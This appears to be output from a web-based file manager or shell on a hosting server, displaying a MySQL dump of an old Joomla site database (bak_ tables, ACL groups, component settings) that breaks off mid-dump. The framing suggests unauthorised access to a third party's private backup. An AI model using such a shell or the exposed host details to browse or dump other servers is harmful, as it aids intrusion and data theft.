????

Your IP : 13.59.182.74


Current Path : /home/filesender/
Upload File :
Current File : //home/filesender/ekvatorpr_ekv3-2023-01-29.sql

-- MySQL dump 10.13  Distrib 5.7.38, for FreeBSD13.0 (amd64)
--
-- Host: db18.freehost.com.ua    Database: ekvatorpr_ekv3
-- ------------------------------------------------------
-- Server version	5.5.42-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `bak_banner`
--

DROP TABLE IF EXISTS `bak_banner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_banner` (
  `bid` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` varchar(30) NOT NULL DEFAULT 'banner',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `imageurl` varchar(100) NOT NULL DEFAULT '',
  `clickurl` varchar(200) NOT NULL DEFAULT '',
  `date` datetime DEFAULT NULL,
  `showBanner` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `custombannercode` text,
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` text NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `tags` text NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`bid`),
  KEY `viewbanner` (`showBanner`),
  KEY `idx_banner_catid` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_banner`
--

LOCK TABLES `bak_banner` WRITE;
/*!40000 ALTER TABLE `bak_banner` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_banner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_bannerclient`
--

DROP TABLE IF EXISTS `bak_bannerclient`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_bannerclient` (
  `cid` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `contact` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `extrainfo` text NOT NULL,
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` time DEFAULT NULL,
  `editor` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`cid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_bannerclient`
--

LOCK TABLES `bak_bannerclient` WRITE;
/*!40000 ALTER TABLE `bak_bannerclient` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_bannerclient` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_bannertrack`
--

DROP TABLE IF EXISTS `bak_bannertrack`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_bannertrack` (
  `track_date` date NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_bannertrack`
--

LOCK TABLES `bak_bannertrack` WRITE;
/*!40000 ALTER TABLE `bak_bannertrack` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_bannertrack` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_categories`
--

DROP TABLE IF EXISTS `bak_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_categories`
--

LOCK TABLES `bak_categories` WRITE;
/*!40000 ALTER TABLE `bak_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_components`
--

DROP TABLE IF EXISTS `bak_components`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_components` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL DEFAULT '',
  `link` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) unsigned NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `admin_menu_link` varchar(255) NOT NULL DEFAULT '',
  `admin_menu_alt` varchar(255) NOT NULL DEFAULT '',
  `option` varchar(50) NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `admin_menu_img` varchar(255) NOT NULL DEFAULT '',
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `enabled` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `parent_option` (`parent`,`option`(32))
) ENGINE=MyISAM AUTO_INCREMENT=34 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_components`
--

LOCK TABLES `bak_components` WRITE;
/*!40000 ALTER TABLE `bak_components` DISABLE KEYS */;
INSERT INTO `bak_components` VALUES (1,'Banners','',0,0,'','Banner Management','com_banners',0,'js/ThemeOffice/component.png',0,'track_impressions=0\ntrack_clicks=0\ntag_prefix=\n\n',1),(2,'Banners','',0,1,'option=com_banners','Active Banners','com_banners',1,'js/ThemeOffice/edit.png',0,'',1),(3,'Clients','',0,1,'option=com_banners&c=client','Manage Clients','com_banners',2,'js/ThemeOffice/categories.png',0,'',1),(4,'Web Links','option=com_weblinks',0,0,'','Manage Weblinks','com_weblinks',0,'js/ThemeOffice/component.png',0,'show_comp_description=1\ncomp_description=\nshow_link_hits=1\nshow_link_description=1\nshow_other_cats=1\nshow_headings=1\nshow_page_title=1\nlink_target=0\nlink_icons=\n\n',1),(5,'Links','',0,4,'option=com_weblinks','View existing weblinks','com_weblinks',1,'js/ThemeOffice/edit.png',0,'',1),(6,'Categories','',0,4,'option=com_categories&section=com_weblinks','Manage weblink categories','',2,'js/ThemeOffice/categories.png',0,'',1),(7,'Contacts','option=com_contact',0,0,'','Edit contact details','com_contact',0,'js/ThemeOffice/component.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(8,'Contacts','',0,7,'option=com_contact','Edit contact details','com_contact',0,'js/ThemeOffice/edit.png',1,'',1),(9,'Categories','',0,7,'option=com_categories&section=com_contact_details','Manage contact categories','',2,'js/ThemeOffice/categories.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(10,'Polls','option=com_poll',0,0,'option=com_poll','Manage Polls','com_poll',0,'js/ThemeOffice/component.png',0,'',1),(11,'News Feeds','option=com_newsfeeds',0,0,'','News Feeds Management','com_newsfeeds',0,'js/ThemeOffice/component.png',0,'',1),(12,'Feeds','',0,11,'option=com_newsfeeds','Manage News Feeds','com_newsfeeds',1,'js/ThemeOffice/edit.png',0,'show_headings=1\nshow_name=1\nshow_articles=1\nshow_link=1\nshow_cat_description=1\nshow_cat_items=1\nshow_feed_image=1\nshow_feed_description=1\nshow_item_description=1\nfeed_word_count=0\n\n',1),(13,'Categories','',0,11,'option=com_categories&section=com_newsfeeds','Manage Categories','',2,'js/ThemeOffice/categories.png',0,'',1),(14,'User','option=com_user',0,0,'','','com_user',0,'',1,'',1),(15,'Search','option=com_search',0,0,'option=com_search','Search Statistics','com_search',0,'js/ThemeOffice/component.png',1,'enabled=0\n\n',1),(16,'Categories','',0,1,'option=com_categories&section=com_banner','Categories','',3,'',1,'',1),(17,'Wrapper','option=com_wrapper',0,0,'','Wrapper','com_wrapper',0,'',1,'',1),(18,'Mail To','',0,0,'','','com_mailto',0,'',1,'',1),(19,'Media Manager','',0,0,'option=com_media','Media Manager','com_media',0,'',1,'upload_extensions=bmp,csv,doc,epg,gif,ico,jpg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,EPG,GIF,ICO,JPG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\nupload_maxsize=10000000\nfile_path=images\nimage_path=images/stories\nrestrict_uploads=1\nallowed_media_usergroup=3\ncheck_mime=1\nimage_extensions=bmp,gif,jpg,png\nignore_extensions=\nupload_mime=image/jpeg,image/gif,image/png,image/bmp,application/x-shockwave-flash,application/msword,application/excel,application/pdf,application/powerpoint,text/plain,application/x-zip\nupload_mime_illegal=text/html\nenable_flash=0\n\n',1),(20,'Articles','option=com_content',0,0,'','','com_content',0,'',1,'show_noauth=0\nshow_title=1\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=1\nshow_create_date=1\nshow_modify_date=1\nshow_item_navigation=0\nshow_readmore=1\nshow_vote=0\nshow_icons=1\nshow_pdf_icon=1\nshow_print_icon=1\nshow_email_icon=1\nshow_hits=1\nfeed_summary=0\n\n',1),(21,'Configuration Manager','',0,0,'','Configuration','com_config',0,'',1,'',1),(22,'Installation Manager','',0,0,'','Installer','com_installer',0,'',1,'',1),(23,'Language Manager','',0,0,'','Languages','com_languages',0,'',1,'site=ru-RU\nadministrator=ru-RU\n\n',1),(24,'Mass mail','',0,0,'','Mass Mail','com_massmail',0,'',1,'mailSubjectPrefix=\nmailBodySuffix=\n\n',1),(25,'Menu Editor','',0,0,'','Menu Editor','com_menus',0,'',1,'',1),(27,'Messaging','',0,0,'','Messages','com_messages',0,'',1,'',1),(28,'Modules Manager','',0,0,'','Modules','com_modules',0,'',1,'',1),(29,'Plugin Manager','',0,0,'','Plugins','com_plugins',0,'',1,'',1),(30,'Template Manager','',0,0,'','Templates','com_templates',0,'',1,'',1),(31,'User Manager','',0,0,'','Users','com_users',0,'',1,'allowUserRegistration=1\nnew_usertype=Registered\nuseractivation=1\nfrontend_userparams=1\n\n',1),(32,'Cache Manager','',0,0,'','Cache','com_cache',0,'',1,'',1),(33,'Control Panel','',0,0,'','Control Panel','com_cpanel',0,'',1,'',1);
/*!40000 ALTER TABLE `bak_components` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_contact_details`
--

DROP TABLE IF EXISTS `bak_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `con_position` varchar(255) DEFAULT NULL,
  `address` text,
  `suburb` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `postcode` varchar(100) DEFAULT NULL,
  `telephone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `misc` mediumtext,
  `image` varchar(255) DEFAULT NULL,
  `imagepos` varchar(20) DEFAULT NULL,
  `email_to` varchar(255) DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) NOT NULL DEFAULT '',
  `webpage` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_contact_details`
--

LOCK TABLES `bak_contact_details` WRITE;
/*!40000 ALTER TABLE `bak_contact_details` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_content`
--

DROP TABLE IF EXISTS `bak_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_content` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `title_alias` varchar(255) NOT NULL DEFAULT '',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `sectionid` int(11) unsigned NOT NULL DEFAULT '0',
  `mask` int(11) unsigned NOT NULL DEFAULT '0',
  `catid` int(11) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` text NOT NULL,
  `urls` text NOT NULL,
  `attribs` text NOT NULL,
  `version` int(11) unsigned NOT NULL DEFAULT '1',
  `parentid` int(11) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `access` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0',
  `metadata` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_section` (`sectionid`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_content`
--

LOCK TABLES `bak_content` WRITE;
/*!40000 ALTER TABLE `bak_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_content_frontpage`
--

DROP TABLE IF EXISTS `bak_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_content_frontpage`
--

LOCK TABLES `bak_content_frontpage` WRITE;
/*!40000 ALTER TABLE `bak_content_frontpage` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_content_rating`
--

DROP TABLE IF EXISTS `bak_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(11) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(11) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_content_rating`
--

LOCK TABLES `bak_content_rating` WRITE;
/*!40000 ALTER TABLE `bak_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_acl_aro`
--

DROP TABLE IF EXISTS `bak_core_acl_aro`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_acl_aro` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `section_value` varchar(240) NOT NULL DEFAULT '0',
  `value` varchar(240) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_section_value_value_aro` (`section_value`(100),`value`(100)),
  KEY `jos_gacl_hidden_aro` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_acl_aro`
--

LOCK TABLES `bak_core_acl_aro` WRITE;
/*!40000 ALTER TABLE `bak_core_acl_aro` DISABLE KEYS */;
INSERT INTO `bak_core_acl_aro` VALUES (10,'users','62',0,'Administrator',0);
/*!40000 ALTER TABLE `bak_core_acl_aro` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_acl_aro_groups`
--

DROP TABLE IF EXISTS `bak_core_acl_aro_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_acl_aro_groups` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `value` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `jos_gacl_parent_id_aro_groups` (`parent_id`),
  KEY `jos_gacl_lft_rgt_aro_groups` (`lft`,`rgt`)
) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_acl_aro_groups`
--

LOCK TABLES `bak_core_acl_aro_groups` WRITE;
/*!40000 ALTER TABLE `bak_core_acl_aro_groups` DISABLE KEYS */;
INSERT INTO `bak_core_acl_aro_groups` VALUES (17,0,'ROOT',1,22,'ROOT'),(28,17,'USERS',2,21,'USERS'),(29,28,'Public Frontend',3,12,'Public Frontend'),(18,29,'Registered',4,11,'Registered'),(19,18,'Author',5,10,'Author'),(20,19,'Editor',6,9,'Editor'),(21,20,'Publisher',7,8,'Publisher'),(30,28,'Public Backend',13,20,'Public Backend'),(23,30,'Manager',14,19,'Manager'),(24,23,'Administrator',15,18,'Administrator'),(25,24,'Super Administrator',16,17,'Super Administrator');
/*!40000 ALTER TABLE `bak_core_acl_aro_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_acl_aro_map`
--

DROP TABLE IF EXISTS `bak_core_acl_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_acl_aro_map` (
  `acl_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(230) NOT NULL DEFAULT '0',
  `value` varchar(100) NOT NULL,
  PRIMARY KEY (`acl_id`,`section_value`,`value`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_acl_aro_map`
--

LOCK TABLES `bak_core_acl_aro_map` WRITE;
/*!40000 ALTER TABLE `bak_core_acl_aro_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_core_acl_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_acl_aro_sections`
--

DROP TABLE IF EXISTS `bak_core_acl_aro_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_acl_aro_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `value` varchar(230) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(230) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_gacl_value_aro_sections` (`value`),
  KEY `jos_gacl_hidden_aro_sections` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_acl_aro_sections`
--

LOCK TABLES `bak_core_acl_aro_sections` WRITE;
/*!40000 ALTER TABLE `bak_core_acl_aro_sections` DISABLE KEYS */;
INSERT INTO `bak_core_acl_aro_sections` VALUES (10,'users',1,'Users',0);
/*!40000 ALTER TABLE `bak_core_acl_aro_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_acl_groups_aro_map`
--

DROP TABLE IF EXISTS `bak_core_acl_groups_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_acl_groups_aro_map` (
  `group_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(240) NOT NULL DEFAULT '',
  `aro_id` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `group_id_aro_id_groups_aro_map` (`group_id`,`section_value`,`aro_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_acl_groups_aro_map`
--

LOCK TABLES `bak_core_acl_groups_aro_map` WRITE;
/*!40000 ALTER TABLE `bak_core_acl_groups_aro_map` DISABLE KEYS */;
INSERT INTO `bak_core_acl_groups_aro_map` VALUES (25,'',10);
/*!40000 ALTER TABLE `bak_core_acl_groups_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_log_items`
--

DROP TABLE IF EXISTS `bak_core_log_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_log_items` (
  `time_stamp` date NOT NULL DEFAULT '0000-00-00',
  `item_table` varchar(50) NOT NULL DEFAULT '',
  `item_id` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_log_items`
--

LOCK TABLES `bak_core_log_items` WRITE;
/*!40000 ALTER TABLE `bak_core_log_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_core_log_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_core_log_searches`
--

DROP TABLE IF EXISTS `bak_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_core_log_searches` (
  `search_term` varchar(128) NOT NULL DEFAULT '',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_core_log_searches`
--

LOCK TABLES `bak_core_log_searches` WRITE;
/*!40000 ALTER TABLE `bak_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_groups`
--

DROP TABLE IF EXISTS `bak_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_groups` (
  `id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `name` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_groups`
--

LOCK TABLES `bak_groups` WRITE;
/*!40000 ALTER TABLE `bak_groups` DISABLE KEYS */;
INSERT INTO `bak_groups` VALUES (0,'Public'),(1,'Registered'),(2,'Special');
/*!40000 ALTER TABLE `bak_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_menu`
--

DROP TABLE IF EXISTS `bak_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) DEFAULT NULL,
  `name` varchar(255) DEFAULT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text,
  `type` varchar(50) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `componentid` int(11) unsigned NOT NULL DEFAULT '0',
  `sublevel` int(11) DEFAULT '0',
  `ordering` int(11) DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `pollid` int(11) NOT NULL DEFAULT '0',
  `browserNav` tinyint(4) DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `utaccess` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `lft` int(11) unsigned NOT NULL DEFAULT '0',
  `rgt` int(11) unsigned NOT NULL DEFAULT '0',
  `home` int(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `componentid` (`componentid`,`menutype`,`published`,`access`),
  KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_menu`
--

LOCK TABLES `bak_menu` WRITE;
/*!40000 ALTER TABLE `bak_menu` DISABLE KEYS */;
